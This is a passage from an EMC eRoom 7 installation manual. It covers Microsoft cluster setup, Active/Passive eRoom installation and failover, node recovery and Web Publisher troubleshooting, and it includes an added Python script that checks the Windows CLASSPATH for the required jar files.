please refer to: http://www.microsoft.com/hcl
• Two Network adapters for each node in the cluster (Five IP addresses are required after
the Operating System installation).
• External Shared Storage Device and storage cables to attach shared storage device to all
computers.
• Each node’s hardware should be identical for easier configuration and compatibility.
Note: At all times, refer to your vendor’s documentation regarding cluster hardware connections and disk configuration.
Hardware configuration requirements
The following are general hardware configuration steps that may apply in any cluster
setup:
• With each node and the storage device powered off, ensure that each node is connected
to the shared storage device properly.
• Power on the shared storage device only and ensure that the shared storage is set to
‘cluster mode’. This may be a switch on the shared storage device itself to enable ‘cluster mode’.
• Power on each node separately and ensure that the SCSI cards are configured correctly.
Again, check your vendor’s documentation regarding SCSI card configuration. Refer to
the Appendix of the Microsoft Step by Step Guide for information on Cluster SCSI connections.
By default, some SCSI cards may be in cluster mode but ‘disabled’. Ensure that each
SCSI card is cluster enabled.
Each SCSI card (on each node) must have a unique initiator ID (a different number for
each card on each node). For example, if the initiator ID is set to 7 on node 1, then set
the initiator ID to 6 on node 2.
Typically, you can configure the SCSI cards during a boot of an individual node by
pressing a particular hotkey (such as ‘ctrl-M’) during SCSI card initiation. Refer to vendor
documentation.
• Refer to hardware vendor’s documentation to assign the Shared Storage drives to an
array and to assign the level of RAID to be used. For example:
Local system drives = RAID 1 (mirrored)
Shared storage device = RAID 5
Operating System, Network, and Disk Installation
Requirements
• Windows 2000 Advanced Server Operating System -- must be installed on both nodes.
• Name resolution method (such as DNS).
• All disks on each node should be formatted as NTFS.
• Each node should belong to the same domain.
• Each node should have its own server name.
• Domain User account for the Cluster Service.
• A total of five IP addresses required.
For the operating system, network, and disk installation, please reference Microsoft’s
Step-by-Step Guide to Installing Cluster Service. Be sure to reference the “Power Sequencing”
chart within this guide to find out when each node (or the storage) should be powered on
or off. This document can be found at:
http://www.microsoft.com/windows2000/techinfo/planning/server/clustersteps.asp
There are no special considerations relating to eRoom 7 for SQL Server setup.
Installing Microsoft’s Cluster Service
Use the instructions in this section as a supplement to the instructions in Microsoft’s
Step-by-Step Guide to Installing Cluster Service. The instructions in this section contain
essential information on how to install Microsoft’s Cluster service so that it will work with
eRoom 7 Clustering.
Operating system installation – Install Windows 2000 Advanced Server on each node.
Network setup – Once each operating system is installed on each node, set up the Network.
Each cluster node requires at least two network adapters -- one adapter connected to a
public network and one connected to a private network consisting of cluster nodes only. A
total of five IP addresses are used. Verify connectivity and create the domain account used
for the cluster service.
Disk setup – Using Windows Disk Management Utilities, ensure disks are formatted as NTFS
and are designated as Basic. Create the drive partitions and assign drive letters. When
configuring your drive partitions, be sure to set up the Quorum disk partition on a RAID
array prior to configuring the cluster services (recommended 500mb for the Quorum disk).
Cluster service setup – Set up and validate the Cluster Service on both nodes per the
Microsoft instructions. See the special notes in the next section.
Cluster Service Setup
eRoom currently supports only Active/Passive clustering for the eRoom web and database
servers. The setup of the Cluster Service is the last step prior to installing the eRoom
software. Please reference the Microsoft Step by Step Guide for detailed steps on setting
up Microsoft’s cluster service. When you finish installing the cluster service, continue
following the Microsoft Guide steps to validate the setup on Node 1 and continue with the
Node 2 setup. Be sure to test the failover by moving the “Cluster Group” to the passive
node.
Note: In steps 9 to 11 of the Microsoft procedure, we recommend that you leave the default
name for the new cluster as “Cluster Group.” If you want to change this name, it is best to
do so after installing the eRoom software. Refer to eRoom technote 729 for additional information.
[Figure: Cluster Group]
eRoom Software Installation
Pre-eRoom software installation checklist
• The cluster hardware is set up, configured, and validated.
• The operating system, network, and disks are set up, configured, and validated.
• The cluster service is installed and running and a successful failover of the cluster group
has been tested.
• A cluster group is created with the appropriate resources, including the cluster name, IP
address, and shared disk resources.
• Microsoft SQL Server 2000 (recommended on a separate server) is properly configured
and ready for the eRoom installation. Both nodes must have access to the SQL Server.
• Microsoft SQL Server Client Network Utility and admin tools are installed on both nodes
prior to the eRoom installation.
• No cluster resources (for example, the IIS Resource) need to be created on the eRoom
web servers within the Cluster Service Administrator. eRoom will install its own resource
dll (ercluster.dll) to the %systemroot%\cluster on each web server node. The eRoom
resource is installed with no special dependencies on other cluster resources.
• The IIS Services are often configured to run iisreset.exe on failure. Disable this through
the Microsoft Windows Services console.
• Domain IUSR anonymous web user account setup is used on both nodes.
While not required, eRoom recommends deleting the default web site within IIS (unless
other applications must use it). Create a new web site and assign the new web site the
virtual IP address of the cluster. The home directory path of the new web site should point
to a new home directory (similar to the inetpub\wwwroot directory) on the shared storage
device. Assign the domain IUSR account to the new web site properties within the Internet
Service Manager. In addition, grant read rights to the new NTFS directory for the domain
IUSR account.
Overview of the eRoom installation in a clustered environment
1. Follow any pre-installation instructions according to the section Pre-installation
Requirements, on page 1 in this manual.
2. Before installing eRoom, create a cluster group containing the shared disk resources,
and verify that the Cluster Service is running.
3. Install eRoom on the first node.
Ensure that node 1 is the active node.
When prompted during the install, place all eRoom program files and data on a logical
drive on the shared storage drive. Do not place eRoom or IIS files on the Quorum drive/
partition.
Since eRoom is not completely installed until it is installed on both nodes, you don’t
create the initial facility until the second node is installed.
4. Install eRoom on the second node:
Move the cluster group from the first node to the second node.
Install eRoom on node 2 again.
You will not be prompted for the location of eRoom files, since you already entered
information during the first node install.
The eRoom install now creates a facility with an initial set of eRooms.
Once the eRoom installation is complete, you can move the cluster group back to the
first node.
5. Ensure that IIS and eRoom services are started.
6. Verify the web site eRoom is installed on is started (within IIS Admin console).
Applying eRoom Maintenance Releases to the Cluster Environment
1. Install eRoom 7.x on the active node 1.
2. Move the cluster group to node 2 and install the eRoom maintenance release there as
well.
3. Move the cluster group back to node 1.
Note: The eRoom install needs access to the shared storage and must be applied to the
active node. Keep in mind that the eRoom program files and data are on the shared storage.
Adding a Failed Web or Database Cluster Node Back to the Cluster
Adding an eRoom web server back to the cluster
1. Rebuild the failed node. This includes the hardware, operating system, and service/
security packs.
2. Install SQL 2000 Client network utility and reboot.
3. Run the cluster service setup and add the failed node back to the existing eRoom cluster.
4. Copy the c:\winnt\cluster\ercluster.dll to the failed node in the same directory path.
5. Run the following from a command line to synchronize the active node IIS configuration
to the passive node. Navigate to the c:\winnt\system32\inetsrv\ directory and run:
iissync firstnode secondnode
(where firstnode and secondnode are the server names of each node).
6. Move the cluster group to the newly rebuilt node.
7. Remove the eRoom Resource listed within the Cluster Administrator UI. (Note: the
resource type will still exist. You are only deleting the eRoom Resource via the UI).
8. Install eRoom Application on the newly rebuilt node. (This install should pick up the
directory locations automatically and “convert” existing facilities).
9. Test eRoom access, creating facilities, and failover.
Adding a Microsoft SQL Server 2000 back to the cluster
Microsoft SQL Server Enterprise Edition installs SQL Server executables and program files on
both nodes. If the active node fails, you can find directions to rebuild the node and add it
back to the cluster within SQL Server Books Online (BOL). The basic process is as follows:
1. Run the Microsoft SQL Server setup program.
2. Remove the failed node from the configuration.
3. Repair the node.
4. Run Setup program again.
When you add that node back into the SQL Server 2000 configuration, SQL Server reinstalls
and reconfigures itself appropriately.
Additional Resources
Microsoft Support Policy for Server Clusters (includes: SANs and Geographically Dispersed
Clusters)
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q309395
Microsoft: Step by Step Guide to Installing Cluster Service
http://www.microsoft.com/windows2000/techinfo/planning/server/clustersteps.asp
Microsoft: How to Install Services Packs in a Cluster
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q174799
Microsoft: Clustering FAQ
http://www.microsoft.com/NTServer/Support/faqs/clustering_faq.asp
SQL Server 2000 Failover Clustering FAQ
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q260758
Installation Order for SQL Server 2000 Enterprise Edition on Microsoft Cluster Server
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q243218
Recommended Private Heartbeat Configuration on a Cluster Server
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q258750
Also see SQL Server Online Books for more information on SQL Server Clustering.
Appendix F: Troubleshooting Problems with Web Publisher
Problem: When attempting to import a file from Content Server into eRoom, Web Publisher
files and folders fail to appear.
Troubleshooting Steps: Verify that you have correctly installed eRoom Version 7.0.2.
Versions prior to 7.0.2 do not display Web Publisher files and folders.

Problem: When attempting to check out a Web Publisher file from eRoom, you receive the
error, “Web Publisher is not installed on the eRoom Server”.
Troubleshooting Steps:
• Verify that Web Publisher has been installed on the eRoom server. Note: Web Publisher
does not need to be running on the eRoom server.
• Verify that the Class Path system environment variable contains the fully qualified path
and filename for wcm.jar (typically located in ...\program files\documentum\shared).

Problem: When attempting to check out a Web Publisher file from eRoom, you receive the
error “The eRoom-to-WCM connector service is not installed”.
Troubleshooting Steps:
• Verify that there is a copy of the file eroom.jar located in the eRoom 7 installation
directory (typically ...\program files\eRoom Server 7).
• Verify that the Class Path system environment variable contains the fully qualified path
and filename for wcm.jar (typically located in c:\program files\documentum\shared).
• Verify that the Class Path system environment variable contains the fully qualified path
and filename for eroom.jar.

Problem: When right-clicking on an eRoom item linked to a Web Publisher file and choosing
“Go to Content Server...”, an error dialog appears with an error similar to this:
“JumpOperation: failed to intialize form: InvokeMethod() failed while calling: onInit This
startupAction:search is not properly defined. Cannot execute.”
Troubleshooting Steps: Verify that you have correctly completed the instructions in this
manual for setting up eRoom Enterprise to work with Web Publisher.
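Two of the rows above ask you to verify that the Class Path environment variable lists the fully qualified path and filename of wcm.jar and eroom.jar. The following is an added example, not from the eRoom guide, that performs that check: it splits a Windows CLASSPATH value, finds the entry for each required jar, and reports entries that are missing, not fully qualified, or (when run on the server itself) not present on disk. The sample CLASSPATH values are constructed.

```python
import ntpath
import os
from typing import Dict, Iterable, List

# Added example, not from the eRoom guide: check a Windows CLASSPATH for the
# jars the troubleshooting table asks about. Sample values are constructed.

REQUIRED_JARS = ("wcm.jar", "eroom.jar")


def classpath_entries(classpath: str) -> List[str]:
    """Split a Windows CLASSPATH on ';', dropping blanks and surrounding quotes."""
    return [e.strip().strip('"') for e in classpath.split(";") if e.strip()]


def locate_jars(classpath: str, required: Iterable[str] = REQUIRED_JARS) -> Dict[str, str]:
    """Map each required jar to the first classpath entry whose filename matches,
    or '' when no entry names it (a directory entry does not count: the table
    asks for path and filename)."""
    entries = classpath_entries(classpath)
    found: Dict[str, str] = {}
    for jar in required:
        found[jar] = next((e for e in entries
                           if ntpath.basename(e).lower() == jar.lower()), "")
    return found


def problems(classpath: str, required: Iterable[str] = REQUIRED_JARS,
             must_exist: bool = False) -> List[str]:
    """Findings for the checklist: missing jars, entries that are not fully
    qualified, and (optionally) entries that do not exist on this machine."""
    findings: List[str] = []
    for jar, entry in locate_jars(classpath, required).items():
        if not entry:
            findings.append(f"{jar}: not listed in CLASSPATH")
        elif not ntpath.isabs(entry):
            findings.append(f"{jar}: entry '{entry}' is not a fully qualified path")
        elif must_exist and not os.path.isfile(entry):
            findings.append(f"{jar}: '{entry}' does not exist on this machine")
    return findings


if __name__ == "__main__":
    # On the eRoom server itself, read the live system variable and check the files exist.
    live = os.environ.get("CLASSPATH", "")
    print(problems(live, must_exist=True) or ["CLASSPATH lists both jars with full paths"])
```

Note that the check is against the value the eRoom service actually sees: the Class Path must be a system variable, not a user variable, and the services must be restarted after it is changed.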
© 2011 - 2013 EMC Corporation. All Rights Reserved.
EMC believes the information in this publication is accurate as of its publication date. The information is subject to change
without notice.
THE INFORMATION IN THIS PUBLICATION IS PROVIDED “AS IS.” EMC CORPORATION MAKES NO REPRESENTATIONS OR
WARRANTIES OF ANY KIND WITH RESPECT TO THE INFORMATION IN THIS PUBLICATION, AND SPECIFICALLY
DISCLAIMS IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
Use, copying, and distribution of any EMC software described in this publication requires an applicable software license.
EMC2, EMC, and the EMC logo are registered trademarks or trademarks of EMC Corporation in the United States and other
countries.
All other trademarks used herein are the property of their respective owners.